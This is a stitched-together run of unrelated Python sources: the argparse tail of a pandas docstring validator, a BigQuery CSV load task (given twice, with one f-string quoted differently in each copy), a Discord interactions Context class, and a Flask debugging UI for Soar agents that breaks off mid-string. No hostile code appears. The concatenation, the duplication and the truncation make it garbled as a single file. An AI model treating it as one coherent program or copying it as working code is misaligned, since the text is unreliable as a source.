"json", "actions" func_help = ( "function or method to validate (e.g. pandas.DataFrame.head) " "if not provided, all docstrings are validated and returned " "as JSON" ) argparser = argparse.ArgumentParser(description="validate pandas docstrings") argparser.add_argument("function", nargs="?", default=None, help=func_help) argparser.add_argument( "--format", default="default", choices=format_opts, help="format of the output when validating " "multiple docstrings (ignored when validating one). 
" "It can be {str(format_opts)[1:-1]}", ) argparser.add_argument( "--prefix", default=None, help="pattern for the " "docstring names, in order to decide which ones " 'will be validated. A prefix "pandas.Series.str."' "will make the script validate all the docstrings " "of methods starting by this pattern. It is " "ignored if parameter function is provided", ) argparser.add_argument( "--errors", default=None, help="comma separated " "list of error codes to validate. By default it " "validates all errors (ignored when validating " "a single docstring)", ) argparser.add_argument( "--ignore_deprecated", default=False, action="store_true", help="if this flag is set, " "deprecated objects are ignored when validating " "all docstrings", ) args = argparser.parse_args() sys.exit( main( args.function, args.prefix, args.errors.split(",") if args.errors else None, args.format, args.ignore_deprecated, ) )
# -*- coding: utf-8 -*- """BigQuery Load Task.""" from pathlib import Path from typing import Dict, List from google.cloud import bigquery from luft.common.column import Column from luft.common.config import ( BQ_DATA_TYPES, BQ_HIST_DEFAULT_TEMPLATE, BQ_STAGE_DEFAULT_TEMPLATE, BQ_STAGE_SCHEMA_FORM, GCS_BUCKET, PATH_PREFIX) from luft.common.logger import setup_logger from luft.common.utils import NoneStr, get_path_prefix from luft.tasks.bq_exec_task import BQExecTask import pkg_resources # Setup logger logger = setup_logger('common', 'INFO') class BQLoadTask(BQExecTask): """BQ Load Task.""" def __init__(self, name: str, task_type: str, source_system: str, source_subsystem: str, columns: List[Column], project_id: NoneStr = None, location: NoneStr = None, dataset_id: NoneStr = None, skip_leading_rows: bool = True, allow_quoted_newlines: bool = True, disable_check: bool = False, field_delimiter: str = '\t', path_prefix: NoneStr = None, yaml_file: NoneStr = None, env: NoneStr = None, thread_name: NoneStr = None, color: NoneStr = None): """Initialize BigQuery Load Task. Attributes: name (str): name of task. task_type (str): type of task. E.g. embulk-jdbc-load, mongo-load, etc. source_system (str): name of source system. Usually name of database. Used for better organization especially on blob storage. E.g. jobs, prace, pzr. source_subsystem (str): name of source subsystem. Usually name of schema. Used for better organization especially on blob storage. E.g. public, b2b. env (str): environment - PROD, DEV. thread_name(str): name of thread for Airflow parallelization. color (str): hex code of color. Airflow operator will have this color. """ self.columns = columns self.path_prefix = path_prefix or PATH_PREFIX self.skip_leading_rows = skip_leading_rows self.allow_quoted_newlines = allow_quoted_newlines self.field_delimiter = field_delimiter self.disable_check = disable_check self.dataset_id = dataset_id or source_system self.stage_dataset_id = BQ_STAGE_SCHEMA_FORM.format( env=self.get_env, source_system=self.get_source_system, source_subsystem=self.get_source_subsystem, dataset_id=self.dataset_id ) super().__init__(name=name, task_type=task_type, source_system=source_system, source_subsystem=source_subsystem, yaml_file=yaml_file, project_id=project_id, location=location, env=env, thread_name=thread_name, color=color) def __call__(self, ts: str, env: NoneStr = None): """Make class callable. Attributes: ts (str): time of valid. 
""" stage_template = Path(pkg_resources.resource_filename( 'luft', BQ_STAGE_DEFAULT_TEMPLATE)) hist_template = Path(pkg_resources.resource_filename( 'luft', BQ_HIST_DEFAULT_TEMPLATE)) env_vars = self.get_env_vars(ts, env) self._create_dataset(self.stage_dataset_id) self._run_bq_command(stage_template.parent, [stage_template.name], env_vars) self.load_csv() self._create_dataset(self.dataset_id) self._run_bq_command(hist_template.parent, [hist_template.name], env_vars) def get_env_vars(self, ts: str, env: NoneStr = None) -> Dict[str, str]: """Get Docker enviromental variables.""" super_env_dict = super().get_env_vars(ts=ts, env=env) env_dict = { 'TABLE_NAME': self.name, 'STAGE_SCHEMA': f'stage_{self.source_system.lower()}', 'HISTORY_SCHEMA': self.source_system.lower(), 'PK': self._get_col_names('pk'), 'PK_DEFINITION_LIST': self._get_col_defs('pk'), 'COLUMNS': self._get_col_names('nonpk'), 'COLUMN_DEFINITION_LIST': self._get_col_defs('nonpk'), 'HASH_COLUMNS': self._get_hash_diff(), 'PK_JOIN': self._get_pk_join() } clean_dict = self.clean_dictionary(env_dict) clean_dict.update(super_env_dict) return clean_dict def _get_col_names(self, col_type: str) -> str: """Get list of column names. Parameters: col_type (str): what type of columns should be returned. Default `all`. Values: - all - primary and nonprimary keys are returned - pk - only primary keys are returned - nonpk - only nonprimary keys are returned. """ cols = [col.get_name(col_type, include_tech=False) for col in self.columns if col.get_name(col_type, include_tech=False)] return ',\n'.join(cols) def _get_col_defs(self, col_type: str) -> str: """Get list of column definition. Parameters: col_type (str): what type of columns should be returned. Default `all`. Values: - all - primary and nonprimary keys are returned - pk - only primary keys are returned - nonpk - only nonprimary keys are returned. """ cols = [col.get_def(col_type, include_tech=False, supported_types=BQ_DATA_TYPES) for col in self.columns if col.get_def(col_type, include_tech=False, supported_types=BQ_DATA_TYPES)] return ',\n '.join(cols) def _get_pk_join(self) -> str: """Get PK join. Parameters: col_type (str): what type of columns should be returned. Default `all`. Values: - all - primary and nonprimary keys are returned - pk - only primary keys are returned - nonpk - only nonprimary keys are returned. """ pk_join = [col.get_join('pk', include_tech=False) for col in self.columns if col.get_join('pk', include_tech=False)] return '\nAND '.join(pk_join) def _get_hash_diff(self) -> str: """Get hash diff columns. Parameters: col_type (str): what type of columns should be returned. Default `all`. Values: - all - primary and nonprimary keys are returned - pk - only primary keys are returned - nonpk - only nonprimary keys are returned. """ cols = [f'IFNULL(CAST({col.get_name('all', include_tech=False)} AS STRING), \'\')' for col in self.columns if col.get_name('all', include_tech=False)] return ', '.join(cols) def load_csv(self): """Load CSV.""" job_config = bigquery.LoadJobConfig() job_config.skip_leading_rows = int(self.skip_leading_rows) job_config.allow_quoted_newlines = self.allow_quoted_newlines job_config.field_delimiter = self.field_delimiter # The source format defaults to CSV, so the line below is optional. 
job_config.source_format = bigquery.SourceFormat.CSV table_ref = self.bq_client.dataset( self.stage_dataset_id).table(self.get_name()) uri = f'gs://{GCS_BUCKET}/' + get_path_prefix(path_prefix=self.path_prefix, env=self.get_env(), source_system=self.get_source_system(), source_subsystem=self.get_source_subsystem(), name=self.get_name(), date_valid=self.get_date_valid(), time_valid=self.get_time_valid() ) + '*' logger.info(f'Loading CSV data from `{uri}`.') load_job = self.bq_client.load_table_from_uri( uri, table_ref, job_config=job_config ) try: load_job.result() stage_table = self.bq_client.get_table(table_ref) logger.info( f'Loaded {stage_table.num_rows} rows into {self.get_name()}.') if self.disable_check and stage_table.num_rows == 0: raise TypeError( f'There is no data in {self.stage_dataset_id + "." + self.get_name()}.') except Exception as e: logger.error(e) logger.error(load_job.errors) raise
# -*- coding: utf-8 -*- """BigQuery Load Task.""" from pathlib import Path from typing import Dict, List from google.cloud import bigquery from luft.common.column import Column from luft.common.config import ( BQ_DATA_TYPES, BQ_HIST_DEFAULT_TEMPLATE, BQ_STAGE_DEFAULT_TEMPLATE, BQ_STAGE_SCHEMA_FORM, GCS_BUCKET, PATH_PREFIX) from luft.common.logger import setup_logger from luft.common.utils import NoneStr, get_path_prefix from luft.tasks.bq_exec_task import BQExecTask import pkg_resources # Setup logger logger = setup_logger('common', 'INFO') class BQLoadTask(BQExecTask): """BQ Load Task.""" def __init__(self, name: str, task_type: str, source_system: str, source_subsystem: str, columns: List[Column], project_id: NoneStr = None, location: NoneStr = None, dataset_id: NoneStr = None, skip_leading_rows: bool = True, allow_quoted_newlines: bool = True, disable_check: bool = False, field_delimiter: str = '\t', path_prefix: NoneStr = None, yaml_file: NoneStr = None, env: NoneStr = None, thread_name: NoneStr = None, color: NoneStr = None): """Initialize BigQuery Load Task. Attributes: name (str): name of task. task_type (str): type of task. E.g. embulk-jdbc-load, mongo-load, etc. source_system (str): name of source system. Usually name of database. Used for better organization especially on blob storage. E.g. jobs, prace, pzr. source_subsystem (str): name of source subsystem. Usually name of schema. Used for better organization especially on blob storage. E.g. public, b2b. env (str): environment - PROD, DEV. thread_name(str): name of thread for Airflow parallelization. color (str): hex code of color. Airflow operator will have this color. """ self.columns = columns self.path_prefix = path_prefix or PATH_PREFIX self.skip_leading_rows = skip_leading_rows self.allow_quoted_newlines = allow_quoted_newlines self.field_delimiter = field_delimiter self.disable_check = disable_check self.dataset_id = dataset_id or source_system self.stage_dataset_id = BQ_STAGE_SCHEMA_FORM.format( env=self.get_env, source_system=self.get_source_system, source_subsystem=self.get_source_subsystem, dataset_id=self.dataset_id ) super().__init__(name=name, task_type=task_type, source_system=source_system, source_subsystem=source_subsystem, yaml_file=yaml_file, project_id=project_id, location=location, env=env, thread_name=thread_name, color=color) def __call__(self, ts: str, env: NoneStr = None): """Make class callable. Attributes: ts (str): time of valid. 
""" stage_template = Path(pkg_resources.resource_filename( 'luft', BQ_STAGE_DEFAULT_TEMPLATE)) hist_template = Path(pkg_resources.resource_filename( 'luft', BQ_HIST_DEFAULT_TEMPLATE)) env_vars = self.get_env_vars(ts, env) self._create_dataset(self.stage_dataset_id) self._run_bq_command(stage_template.parent, [stage_template.name], env_vars) self.load_csv() self._create_dataset(self.dataset_id) self._run_bq_command(hist_template.parent, [hist_template.name], env_vars) def get_env_vars(self, ts: str, env: NoneStr = None) -> Dict[str, str]: """Get Docker enviromental variables.""" super_env_dict = super().get_env_vars(ts=ts, env=env) env_dict = { 'TABLE_NAME': self.name, 'STAGE_SCHEMA': f'stage_{self.source_system.lower()}', 'HISTORY_SCHEMA': self.source_system.lower(), 'PK': self._get_col_names('pk'), 'PK_DEFINITION_LIST': self._get_col_defs('pk'), 'COLUMNS': self._get_col_names('nonpk'), 'COLUMN_DEFINITION_LIST': self._get_col_defs('nonpk'), 'HASH_COLUMNS': self._get_hash_diff(), 'PK_JOIN': self._get_pk_join() } clean_dict = self.clean_dictionary(env_dict) clean_dict.update(super_env_dict) return clean_dict def _get_col_names(self, col_type: str) -> str: """Get list of column names. Parameters: col_type (str): what type of columns should be returned. Default `all`. Values: - all - primary and nonprimary keys are returned - pk - only primary keys are returned - nonpk - only nonprimary keys are returned. """ cols = [col.get_name(col_type, include_tech=False) for col in self.columns if col.get_name(col_type, include_tech=False)] return ',\n'.join(cols) def _get_col_defs(self, col_type: str) -> str: """Get list of column definition. Parameters: col_type (str): what type of columns should be returned. Default `all`. Values: - all - primary and nonprimary keys are returned - pk - only primary keys are returned - nonpk - only nonprimary keys are returned. """ cols = [col.get_def(col_type, include_tech=False, supported_types=BQ_DATA_TYPES) for col in self.columns if col.get_def(col_type, include_tech=False, supported_types=BQ_DATA_TYPES)] return ',\n '.join(cols) def _get_pk_join(self) -> str: """Get PK join. Parameters: col_type (str): what type of columns should be returned. Default `all`. Values: - all - primary and nonprimary keys are returned - pk - only primary keys are returned - nonpk - only nonprimary keys are returned. """ pk_join = [col.get_join('pk', include_tech=False) for col in self.columns if col.get_join('pk', include_tech=False)] return '\nAND '.join(pk_join) def _get_hash_diff(self) -> str: """Get hash diff columns. Parameters: col_type (str): what type of columns should be returned. Default `all`. Values: - all - primary and nonprimary keys are returned - pk - only primary keys are returned - nonpk - only nonprimary keys are returned. """ cols = [f'IFNULL(CAST({col.get_name("all", include_tech=False)} AS STRING), \'\')' for col in self.columns if col.get_name('all', include_tech=False)] return ', '.join(cols) def load_csv(self): """Load CSV.""" job_config = bigquery.LoadJobConfig() job_config.skip_leading_rows = int(self.skip_leading_rows) job_config.allow_quoted_newlines = self.allow_quoted_newlines job_config.field_delimiter = self.field_delimiter # The source format defaults to CSV, so the line below is optional. 
job_config.source_format = bigquery.SourceFormat.CSV table_ref = self.bq_client.dataset( self.stage_dataset_id).table(self.get_name()) uri = f'gs://{GCS_BUCKET}/' + get_path_prefix(path_prefix=self.path_prefix, env=self.get_env(), source_system=self.get_source_system(), source_subsystem=self.get_source_subsystem(), name=self.get_name(), date_valid=self.get_date_valid(), time_valid=self.get_time_valid() ) + '*' logger.info(f'Loading CSV data from `{uri}`.') load_job = self.bq_client.load_table_from_uri( uri, table_ref, job_config=job_config ) try: load_job.result() stage_table = self.bq_client.get_table(table_ref) logger.info( f'Loaded {stage_table.num_rows} rows into {self.get_name()}.') if self.disable_check and stage_table.num_rows == 0: raise TypeError( f'There is no data in {self.stage_dataset_id + "." + self.get_name()}.') except Exception as e: logger.error(e) logger.error(load_job.errors) raise
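A hedged construction sketch for BQLoadTask; every value below is an illustrative placeholder, and columns is left empty because the Column constructor is not shown above. Calling the task loads the staged CSVs from GCS and runs the stage and history templates, so it needs real GCP credentials to do anything useful.

task = BQLoadTask(
    name='users',              # placeholder table name
    task_type='bq-load',       # placeholder task type
    source_system='jobs',
    source_subsystem='public',
    columns=[],                # List[Column]; real tasks need Column objects
    env='DEV',
)
task(ts='2020-01-01T00:00:00')  # ts is the time of validity passed to get_env_vars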
from dataclasses import dataclass
from typing import Any, List, Union

import inspect
import itertools
import warnings
import types

import requests

from flask_discord_interactions.models import (
    LoadableDataclass,
    Member,
    Channel,
    Role,
    User,
    CommandOptionType,
    ApplicationCommandType,
    Message
)


@dataclass
class Context(LoadableDataclass):
    """
    Represents the context in which a :class:`Command` or custom ID
    handler is invoked.

    Attributes
    ----------
    author
        A :class:`Member` object representing the invoking user.
    id
        The unique ID (snowflake) of this interaction.
    type
        The :class:`ApplicationCommandType` of this interaction.
    token
        The token to use when sending followup messages.
    channel_id
        The unique ID (snowflake) of the channel this command was invoked in.
    guild_id
        The unique ID (snowflake) of the guild this command was invoked in.
    options
        A list of the options passed to the command.
    values
        A list of the values selected, if this is a Select Menu handler.
    resolved
        Additional data (users, members, channels, roles, and messages)
        resolved from the options and target of this interaction.
    command_name
        The name of the command that was invoked.
    command_id
        The unique ID (snowflake) of the command that was invoked.
    members
        :class:`Member` objects for each user specified as an option.
    channels
        :class:`Channel` objects for each channel specified as an option.
    roles
        :class:`Role` objects for each role specified as an option.
    target
        The targeted :class:`User` or :class:`Message`.
    """
    author: Member = None
    id: str = None
    type: int = None
    token: str = None
    channel_id: str = None
    guild_id: str = None
    options: list = None
    values: list = None
    resolved: dict = None
    command_name: str = None
    command_id: str = None
    members: List[Member] = None
    channels: List[Channel] = None
    roles: List[Role] = None

    app: Any = None
    discord: Any = None

    custom_id: str = None
    primary_id: str = None
    handler_state: list = None

    target_id: str = None
    target: Union[User, Message] = None

    @classmethod
    def from_data(cls, discord=None, app=None, data=None):
        # Avoid a mutable default argument; treat a missing payload as empty.
        if data is None:
            data = {}

        # If this is a proxy (e.g. flask.current_app), get the current object
        # https://flask.palletsprojects.com/en/2.0.x/reqcontext/#notes-on-proxies
        if hasattr(app, "_get_current_object"):
            app = app._get_current_object()

        result = cls(
            app=app,
            discord=discord,
            author=Member.from_dict(data.get("member", {})),
            id=data.get("id"),
            type=data.get("data", {}).get("type") or ApplicationCommandType.CHAT_INPUT,
            token=data.get("token"),
            channel_id=data.get("channel_id"),
            guild_id=data.get("guild_id"),
            options=data.get("data", {}).get("options"),
            values=data.get("data", {}).get("values", []),
            resolved=data.get("data", {}).get("resolved", {}),
            command_name=data.get("data", {}).get("name"),
            command_id=data.get("data", {}).get("id"),
            custom_id=data.get("data", {}).get("custom_id") or "",
            target_id=data.get("data", {}).get("target_id"),
        )

        result.data = data
        result.parse_custom_id()
        result.parse_resolved()
        result.parse_target()
        return result

    @property
    def auth_headers(self):
        if self.discord:
            return self.discord.auth_headers(self.app)
        else:
            return self.frozen_auth_headers

    def parse_custom_id(self):
        """
        Parse the custom ID of the incoming interaction data.

        This includes the primary ID as well as any state stored in the
        handler.
        """
        self.primary_id = self.custom_id.split("\n", 1)[0]
        self.handler_state = self.custom_id.split("\n")

    def parse_resolved(self):
        """
        Parse the ``"resolved"`` section of the incoming interaction data.

        This section includes objects representing each user, member,
        channel, and role passed as an argument to the command.
""" self.members = {} for id in self.resolved.get("members", {}): member_info = self.resolved["members"][id] member_info["user"] = self.resolved["users"][id] self.members[id] = Member.from_dict(member_info) self.channels = {id: Channel.from_dict(data) for id, data in self.resolved.get("channels", {}).items()} self.roles = {id: Role.from_dict(data) for id, data in self.resolved.get("roles", {}).items()} self.messages = { id: Message.from_dict(data) for id, data in self.resolved.get("messages", {}).items() } def parse_target(self): """ Parse the target of the incoming interaction. For User and Message commands, the target is the relevant user or message. This method sets the `ctx.target` field. """ if self.type == ApplicationCommandType.USER: self.target = self.members[self.target_id] elif self.type == ApplicationCommandType.MESSAGE: self.target = self.messages[self.target_id] else: self.target = None def create_args(self): """ Create the arguments which will be passed to the function when the :class:`Command` is invoked. """ if self.type == ApplicationCommandType.CHAT_INPUT: return self.create_args_chat_input() elif self.type == ApplicationCommandType.USER: return [self.target], {} elif self.type == ApplicationCommandType.MESSAGE: return [self.target], {} def create_args_chat_input(self): """ Create the arguments for this command, assuming it is a ``CHAT_INPUT`` command. """ def create_args_recursive(data, resolved): if not data.get("options"): return [], {} args = [] kwargs = {} for option in data["options"]: if option["type"] in [ CommandOptionType.SUB_COMMAND, CommandOptionType.SUB_COMMAND_GROUP]: args.append(option["name"]) sub_args, sub_kwargs = create_args_recursive( option, resolved) args += sub_args kwargs.update(sub_kwargs) elif option["type"] == CommandOptionType.USER: member_data = resolved["members"][option["value"]] member_data["user"] = resolved["users"][option["value"]] kwargs[option["name"]] = Member.from_dict(member_data) elif option["type"] == CommandOptionType.CHANNEL: kwargs[option["name"]] = Channel.from_dict( resolved["channels"][option["value"]]) elif option["type"] == CommandOptionType.ROLE: kwargs[option["name"]] = Role.from_dict( resolved["roles"][option["value"]]) else: kwargs[option["name"]] = option["value"] return args, kwargs return create_args_recursive({"options": self.options}, self.resolved) def create_handler_args(self, handler): """ Create the arguments which will be passed to the function when a custom ID handler is invoked. Parameters ---------- data An object with the incoming data for the invocation. """ args = self.handler_state[1:] sig = inspect.signature(handler) iterator = zip( itertools.count(), args, itertools.islice(sig.parameters.values(), 1, None) ) for i, argument, parameter in iterator: annotation = parameter.annotation if annotation == int: args[i] = int(argument) elif annotation == bool: if argument == "True": args[i] = True elif argument == "False": args[i] = False elif argument == "None": args[i] = None else: raise ValueError( f"Invalid bool in handler state parsing: {args[i]}") return args def followup_url(self, message=None): """ Return the followup URL for this interaction. This URL can be used to send a new message, or to edit or delete an existing message. Parameters ---------- message The ID of the message to edit or delete. If None, sends a new message. If "@original", refers to the original message. 
""" url = (f"{self.app.config['DISCORD_BASE_URL']}/webhooks/" f"{self.app.config['DISCORD_CLIENT_ID']}/{self.token}") if message is not None: url += f"/messages/{message}" return url def edit(self, updated, message="@original"): """ Edit an existing message. Parameters ---------- updated The updated Message to edit the message to. message The ID of the message to edit. If omitted, edits the original message. """ updated = Message.from_return_value(updated) if not self.app or self.app.config["DONT_REGISTER_WITH_DISCORD"]: return updated = requests.patch( self.followup_url(message), json=updated.dump_followup(), headers=self.auth_headers ) updated.raise_for_status() def delete(self, message="@original"): """ Delete an existing message. Parameters ---------- message The ID of the message to delete. If omitted, deletes the original message. """ if not self.app or self.app.config["DONT_REGISTER_WITH_DISCORD"]: return response = requests.delete( self.followup_url(message), headers=self.auth_headers ) response.raise_for_status() def send(self, message): """ Send a new followup message. Parameters ---------- message The :class:`Message` to send as a followup message. """ if not self.app or self.app.config["DONT_REGISTER_WITH_DISCORD"]: return message = Message.from_return_value(message) message = requests.post( self.followup_url(), headers=self.auth_headers, **message.dump_multipart() ) message.raise_for_status() return message.json()["id"] def get_command(self, command_name=None): "Get the ID of a command by name." if command_name is None: return self.command_id else: try: return self.app.discord_commands[command_name].id except KeyError: raise ValueError(f"Unknown command: {command_name}") def overwrite_permissions(self, permissions, command=None): """ Overwrite the permission overwrites for this command. Parameters ---------- permissions The new list of permission overwrites. command The name of the command to overwrite permissions for. If omitted, overwrites for the invoking command. """ url = ( f"{self.app.config['DISCORD_BASE_URL']}/" f"applications/{self.app.config['DISCORD_CLIENT_ID']}/" f"guilds/{self.guild_id}/" f"commands/{self.get_command(command)}/permissions" ) data = [permission.dump() for permission in permissions] if self.app.config["DONT_REGISTER_WITH_DISCORD"]: return response = requests.put(url, headers=self.auth_headers, json={ "permissions": data }) response.raise_for_status() def freeze(self): "Return a copy of this Context that can be pickled for RQ and Celery." app = types.SimpleNamespace() CONFIG_KEYS = [ "DISCORD_BASE_URL", "DISCORD_CLIENT_ID", "DONT_REGISTER_WITH_DISCORD", ] app.config = { key: self.app.config[key] for key in CONFIG_KEYS } new_context = Context.from_data(app=app, data=self.data) new_context.frozen_auth_headers = self.auth_headers return new_context @dataclass class AsyncContext(Context): """ Represents the context in which an asynchronous :class:`Command` is invoked. Also provides coroutine functions to handle followup messages. Users should not need to instantiate this class manually. """ def __post_init__(self): if not self.app or self.app.config["DONT_REGISTER_WITH_DISCORD"]: return self.session = self.app.discord_client_session async def edit(self, updated, message="@original"): """ Edit an existing message. Parameters ---------- updated The updated Message to edit the message to. message The ID of the message to edit. If omitted, edits the original message. 
""" updated = Message.from_return_value(updated) if not self.app or self.app.config["DONT_REGISTER_WITH_DISCORD"]: return await self.session.patch( self.followup_url(message), json=updated.dump_followup() ) async def delete(self, message="@original"): """ Delete an existing message. Parameters ---------- message The ID of the message to delete. If omitted, deletes the original message. """ if not self.app or self.app.config["DONT_REGISTER_WITH_DISCORD"]: return await self.session.delete(self.followup_url(message)) async def send(self, message): """ Send a new followup message. Parameters ---------- message The Message object to send as a followup message. """ message = Message.from_return_value(message) if not self.app or self.app.config["DONT_REGISTER_WITH_DISCORD"]: return async with self.session.post( self.followup_url(), headers=self.auth_headers, **message.dump_multipart() ) as message: return (await message.json())["id"] async def overwrite_permissions(self, permissions, command=None): """ Overwrite the permission overwrites for this command. Parameters ---------- permissions The new list of permission overwrites. command The name of the command to overwrite permissions for. If omitted, overwrites for the invoking command. """ url = ( f"{self.app.config['DISCORD_BASE_URL']}/" f"applications/{self.app.config['DISCORD_CLIENT_ID']}/" f"guilds/{self.guild_id}/" f"commands/{self.get_command(command)}/permissions" ) data = [permission.dump() for permission in permissions] if not self.app or self.app.config["DONT_REGISTER_WITH_DISCORD"]: return await self.session.put(url, headers=self.auth_headers, json={ "permissions": data }) async def close(self): """ Deprecated as of v1.0.2. Previously, this closed the AsyncContext's aiohttp ClientSession that was used to send followup messages. This is no longer necessary, as this library now maintains a single ClientSession for the entire application. """ warnings.warn( "Deprecated! AsyncContext.close is a no-op. " "Since v1.0.2, only one aiohttp ClientSession is created " "for all requests to Discord for the app. " "Thus, there is no need to close the AsyncContext. ", DeprecationWarning )
from flask import Flask, request, url_for app = Flask(__name__) import html import json ############################### ############################### import sys from os import environ as env sys.path.append(env['SOAR_HOME']) import Python_sml_ClientInterface as sml kernel = sml.Kernel_CreateKernelInCurrentThread(True, 0) prints = {} def callback_print_message(mid, user_data, agent, message): global prints prints[user_data].append(message.strip()) ############################### ############################### SITE_TITLE = 'Soar' def _out(l): return "\n".join(l) def _header(ret, title): ret.append('<!doctype html>') ret.append('<html lang="en">') ret.append('<head>') ret.append('<!-- Required meta tags -->') ret.append('<meta charset="utf-8">') ret.append('<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">') ret.append('<link href="{}" rel="stylesheet">'.format(url_for('static', filename="bootstrap.min.css"))) ret.append('<title>{} - {}</title>'.format(html.escape(SITE_TITLE), html.escape(title))) ret.append('<link rel="apple-touch-icon" sizes="57x57" href="{}">'.format(url_for('static', filename="apple-icon-57x57.png"))) ret.append('<link rel="apple-touch-icon" sizes="60x60" href="{}">'.format(url_for('static', filename="apple-icon-60x60.png"))) ret.append('<link rel="apple-touch-icon" sizes="72x72" href="{}">'.format(url_for('static', filename="apple-icon-72x72.png"))) ret.append('<link rel="apple-touch-icon" sizes="76x76" href="{}">'.format(url_for('static', filename="apple-icon-76x76.png"))) ret.append('<link rel="apple-touch-icon" sizes="114x114" href="{}">'.format(url_for('static', filename="apple-icon-114x114.png"))) ret.append('<link rel="apple-touch-icon" sizes="120x120" href="{}">'.format(url_for('static', filename="apple-icon-120x120.png"))) ret.append('<link rel="apple-touch-icon" sizes="144x144" href="{}">'.format(url_for('static', filename="apple-icon-144x144.png"))) ret.append('<link rel="apple-touch-icon" sizes="152x152" href="{}">'.format(url_for('static', filename="apple-icon-152x152.png"))) ret.append('<link rel="apple-touch-icon" sizes="180x180" href="{}">'.format(url_for('static', filename="apple-icon-180x180.png"))) ret.append('<link rel="icon" type="image/png" sizes="192x192" href="{}">'.format(url_for('static', filename="android-icon-192x192.png"))) ret.append('<link rel="icon" type="image/png" sizes="32x32" href="{}">'.format(url_for('static', filename="favicon-32x32.png"))) ret.append('<link rel="icon" type="image/png" sizes="96x96" href="{}">'.format(url_for('static', filename="favicon-96x96.png"))) ret.append('<link rel="icon" type="image/png" sizes="16x16" href="{}">'.format(url_for('static', filename="favicon-16x16.png"))) ret.append('<link rel="manifest" href="{}">'.format(url_for('static', filename="manifest.json"))) ret.append('<meta name="msapplication-TileColor" content="#ffffff">') ret.append('<meta name="msapplication-TileImage" content="{}">'.format(url_for('static', filename="ms-icon-144x144.png"))) ret.append('<meta name="theme-color" content="#ffffff">') ret.append('</head>') ret.append('<body>') ret.append('<div class="container">') ret.append('<h1>{}</h1>'.format(html.escape(title))) def _footer(ret, js=[]): ret.append('</div>') ret.append('<script src="{}"></script>'.format(url_for('static', filename='jquery-3.3.1.min.js'))) ret.append('<script src="{}"></script>'.format(url_for('static', filename='popper.min.js'))) ret.append('<script src="{}"></script>'.format(url_for('static', filename='bootstrap.min.js'))) 
ret.append('<script>') ret.append(_out(js)) ret.append('</script>') ret.append('</body>') ret.append('</html>') def _has_needed_post(l): for n in l: if n not in request.form: return False return True def _has_needed_get(l): for n in l: if n not in request.args: return False return True ############################### ############################### @app.route("/", methods=['POST', 'GET']) def hello(): global kernel doc = [] js = [] _header(doc, 'Home') doc.append('<hr />') doc.append('<div class="row" style="margin-bottom: 10px">') doc.append('<div class="col">') doc.append('<h2>New Agent</h2>') doc.append('<form id="fA">') doc.append('<div class="form-row">') doc.append('<div class="col-9"><input type="text" class="form-control" id="newName" value="" placeholder="Enter agent name" /></div>') doc.append('<div class="col"><input type="submit" class="btn btn-primary" id="create" value="create" /></div>') doc.append('</div>') doc.append('</form>') doc.append('</div>') doc.append('</div>') # doc.append('<div class="row">') doc.append('<div class="col">') doc.append('<h2>Existing Agents</h2>') doc.append('<div id="agents" class="card-columns">') doc.append('</div>') doc.append('</div>') doc.append('</div>') # doc.append('</div>') ## js.append('function refreshList() {') js.append('var agentList = $("#agents");') js.append('agentList.empty();') js.append('$.ajax({ url:"/agents", type: "GET", dataType: "json", data:{}, success:function(data) { ') js.append('for (i=0; i<data.length; i++) {') js.append('agentList.append($("<div></div>", {"class":"card"}).append($("<div></div>", {"class":"card-body"}).append([$("<h5></h5>", {"class":"card-title"}).text(data[i]), $("<a></a>", {"class":"btn btn-primary", "href":"/debug?agent="+data[i], "target":"_blank"}).text("debug"), $("<span></span>").text(" "), $("<button></button>", {"class":"btn btn-danger", "onclick":"removeAgent(\'" + data[i] + "\');"}).text("remove")])));') js.append('}') js.append('}});') js.append('}') js.append('function removeAgent(name) {') js.append('$.ajax({ url:"/remove", type: "POST", dataType: "json", data:{ "name":name }, success:function(data) { ') js.append('refreshList();') js.append('}});') js.append('}') js.append('$(document).ready (function() {') js.append('$("#fA").submit(function(event) {') js.append('event.preventDefault();') js.append('var c = $("#newName")[0].value;') js.append('if ($.trim(c).length > 0)') js.append('$.ajax({ url:"/create", type: "POST", dataType: "json", data:{ "name":c }, success:function(data) { ') js.append('if (data.result) {') js.append('$("#newName")[0].value="";') js.append('refreshList();') js.append('} else {') js.append('alert("Error creating agent!")') js.append('}') js.append('}});') js.append('});') js.append('refreshList();') js.append('});') _footer(doc, js) return _out(doc) @app.route("/create", methods=['POST']) def create(): global kernel global prints ret = { "result":False } if _has_needed_post(["name"]): ret["result"] = (kernel.CreateAgent(request.form["name"]) is not None) if ret["result"]: prints[request.form["name"]] = [] kernel.GetAgent(request.form["name"]).RegisterForPrintEvent(sml.smlEVENT_PRINT, callback_print_message, request.form["name"]) return json.dumps(ret) @app.route("/remove", methods=['POST']) def remove(): global kernel global prints ret = { "result":False } if _has_needed_post(["name"]): ret["result"] = kernel.DestroyAgent(kernel.GetAgent(request.form["name"])) if ret["result"]: prints.pop(request.form["name"]) return json.dumps(ret) @app.route("/agents", 
methods=['GET']) def agents(): global kernel ret = [] for i in range(kernel.GetNumberAgents()): ret.append(kernel.GetAgentByIndex(i).GetAgentName()) return json.dumps(ret) @app.route("/debug", methods=['GET']) def debug(): global kernel agent_name = request.args['agent'] agent = kernel.GetAgent(agent_name) doc = [] js = [] _header(doc, agent.GetAgentName()) doc.append('<div class="row">') ## doc.append('<div class="col-6">') doc.append('<div style="margin-bottom: 1rem"><form id="f1">') doc.append('<div class="form-row">') doc.append('<div class="col-9"><input type="text" class="form-control" id="cmd" value="" placeholder="Enter command" /></div>') doc.append('<div class="col"><input type="submit" class="btn btn-primary" id="go" value="Go!" /></div>') doc.append('<div class="col"><input type="button" class="btn btn-secondary" id="clear" value="Clear" /></div>') doc.append('</div>') doc.append('</form></div>') doc.append('<ul id="things" class="list-group">') doc.append('</ul>') doc.append('</div>') ## doc.append('<div class="col-6">') doc.append('<ul class="nav nav-tabs" id="myTab" role="tablist" style="margin-bottom: 1rem">') doc.append('<li class="nav-item"><a class="nav-link active" id="stack-tab" data-toggle="tab" href="#stack" role="tab" aria-controls="stack" aria-selected="true">State Stack</a></li>') doc.append('<li class="nav-item"><a class="nav-link" id="state-tab" data-toggle="tab" href="#state" role="tab" aria-controls="state" aria-selected="false">State</a></li>') doc.append('<li class="nav-item"><a class="nav-link" id="source-tab" data-toggle="tab" href="#source" role="tab" aria-controls="source" aria-selected="false">Source File</a></li>') doc.append('</ul>') ##### doc.append('<div class="tab-content" id="myTabContent">') doc.append('<div class="tab-pane show active" id="stack" role="tabpanel" 